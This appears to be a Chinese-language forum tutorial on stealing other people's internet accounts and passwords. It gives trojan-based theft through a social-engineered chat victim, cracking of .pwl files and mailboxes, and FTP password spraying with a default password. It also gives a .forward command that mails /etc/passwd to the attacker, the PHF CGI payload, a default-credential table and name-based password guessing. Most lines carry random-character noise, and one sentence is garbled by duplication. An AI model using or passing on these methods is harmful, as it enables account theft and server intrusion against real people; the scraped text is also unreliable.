如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。2 u7 ?+ R$ k, D2 I% ~5 d
方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。& g7 d5 i, m" O4 k
优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......3 m& k" g$ P; N: G2 J8 \
缺点:只有一个,那就是如何让对方乖乖的运行你的程序。
6 J8 y% f r8 E5 o; Q# q提示:先问清你的目标和你是不是在一个城市。& J0 }2 W- q) ?& Z- h
实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。. B" A t+ N, h% R. ~
哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。$ Z. @: R" l9 E0 P4 d' i
忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。: C. Q' \8 Y& P
方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客/ z& ]* D2 X- d: D
优点:没什么优点; A. Y( ^$ I/ \6 P5 P
缺点:要具体情况具体对待,太麻烦) l7 G- r J0 Q; r b
提示:平时多多留神。
% J: ?& l& F/ z; O譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net
% l( b) b4 b+ G9 n& t6 L密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。
- _% e. k% S4 G' m; [: W. k运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破
" c8 N$ k% r: k/ o$ ~& b7 m方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。2 M* q, @* k; ?7 X- P( B
优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。- u- D; ^- d' ]( A5 l. P
缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。
+ }3 t- z' B5 e: _* q由于介绍此类的教学文章比较多,我就不班门弄斧了。
( \$ m% n- M& `6 o& L9 Z, l
; O* L' r' l( e哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。$ ^& O! E o+ S4 u$ y
只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。' B/ j' M/ x: U5 y
有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:
5 B. a% E' ^- W2 r! T. |( [" C7 L3 f0 K, X" K) B$ r/ }
------------------------------3 ]- Z) j* y! ~: r. p" a- v! s; Z
) y# T$ e7 \$ r8 x* F. \
XXX,你好(XX是你在表格上填的名字)
8 y# w2 H0 J! n: `$ f你在XX热线的主页空间已开通/ M! c K- h L v4 K2 P
帐户名:XXX 密码:11% y/ S2 C2 p& U+ Y. [
-----------XX热线$ Y2 T8 ?3 w2 j+ L/ l# Q: i. O8 w
电话:XXXX-XXXXXXXX
- ~5 [% O- U; Z& r8 r6 M0 b------------------------------: C& @9 C3 ^6 ~, Q& n/ o, l
* q5 x: Z* X: E/ G: R% f7 w好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。- R8 o; x. s }) @9 H
开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。6 \% f9 @; e* a, V) u0 V( K1 `
上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!
- Q- t4 z7 U; P m* f! g 0 F2 ]6 {- f2 D/ ?# W
0 ^6 b0 f2 J' X+ f9 A) B
如何获得第一个帐号
4 K/ P3 s* i% j3 j8 z& B% n* Z ]" V* f" U% [1 D
我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.' ^, l( k6 N9 ]0 M `; L% L. R7 F
' ?3 F2 N% w$ i- }确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。
* d: g9 |, D& t" @; O9 x, y& \3 `0 M5 i. G
如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.* H% r, o) m3 c
e( g( Q d% o1 f! b以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-< % ~' V( E4 T% M% \7 w3 g5 H
0 T u0 Y7 r6 h. r- s- L' ]
还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!! u* a+ q; r9 m0 S# Q+ I
1 p, b( H2 G7 v7 K, R! P
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:, w6 z8 L4 ]9 B
y7 F; O8 U, ?( t b帐号 密码) G0 c% M5 O' L% j; S
----------- ----------------( x; `& O' y. i! j& e. _
root root S2 M- F( Z: `# @
sys sys/system/bin, ?$ y, n% m) M! L2 c
bin sys/bin/ f- J1 E7 |0 @8 Q0 H( j0 G' M
mountfsys mountfsys
j' W4 ]6 ^) @- Gadm adm
6 ` g. D# k4 ^; x; x8 {8 r1 K7 R: Wuucp uucp$ ?5 f5 O& ^% A
nuucp anon3 O; D9 K; p& |$ O% ~9 N, e, h( Z
anon anon
* O/ Y* T! U d/ {, {: [user user
2 W4 o; A( J! m+ \5 _. X! k' M: A' pgames games- t* c8 P. k- }2 P- n
install install# J) \$ P7 _- \7 c6 _3 t
reboot 给 "command login" 用的
6 l* x: C" [4 s) sdemo demo! V1 I3 {2 e& W9 b9 i; w) z) G+ b
umountfsys umountfsys
7 X$ G# l! K% x# w; csync sync
2 K; c% x* b: L* a$ Ladmin admin% f8 w! Y$ Y% c6 |* B/ I1 e0 k2 F) q" z
guest guest
0 K6 K* M0 A; C: L4 c: Jdaemon daemon0 ]% n* c6 _5 W; U2 _
________________________________________________________________9 M R2 C. H5 C6 \8 K- z
/ u7 A- h' @; }# k5 o" q
有些管理员忘记把他们改掉,那你就发财了!/ F9 }. \3 w, k( \$ i" S
" J+ s& k& c, h4 T8 K% t& C另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.
, {' C3 w7 {& n' \6 x1 R
2 Z; {: r5 w" X0 i) c: u只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:
; j0 S& f& p" b$ K* `
- k, D3 g! g! n' x7 I.........+ G+ ?; Z3 u. m6 J/ C: y
% E, x( u; U+ j# a% Wxlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh( x: V; e; } k: b
$ M: F7 I) a [) \% n
qingyuan:x:275:50::/usr/qingyuan:/bin/sh
8 x. h* w6 l) d |5 f9 e8 n q6 ?' g2 ?% a! {/ n1 a+ G
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh1 }0 y6 b" u" r! O3 o, ?
+ g* }. O, n2 F
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh! y. M2 x" g9 |# ?% u* Q3 S
4 L- B+ j2 L! r4 K! l# E% t% a3 Ukyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh2 G+ r; _0 I: c& B2 S5 }! k
6 _3 g8 J% m4 b0 P! l. \
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh5 v. i) t0 v% \4 v
- N- ^# M# m+ [8 N2 j6 Jtide:x:301:50:Wang XinYi:/usr/tide:/bin/sh4 Z. X* J2 d# L! Y4 q, o
- J2 e/ D. D. E5 D0 P$ A
............
4 i8 f% j7 U$ q/ K8 ]+ @/ [% J
3 p, U2 L/ G6 @: {$ e: r% ~: b5 q这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.
[+ l$ A& G% Z$ b( l9 |, ]; k* U6 ?- J4 k
如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.
& T/ Z9 i1 }5 ?$ S+ }" W
& ]- g$ ~$ H: `+ V- j当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.
* t+ M; u. {4 [- r7 P u6 B( }2 M0 p( ~( W* a3 K
如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.! B& {3 E* p9 C; E6 Y" I* b
3 [& M/ B* g1 Z7 }
最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.' w4 U3 N* X6 R$ L! O* X- U+ A; |$ b( N
, w9 p A* c# U8 u
你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.
# J' G P) B! `
7 x1 `7 ?- R# C9 C7 M; L' u5 F |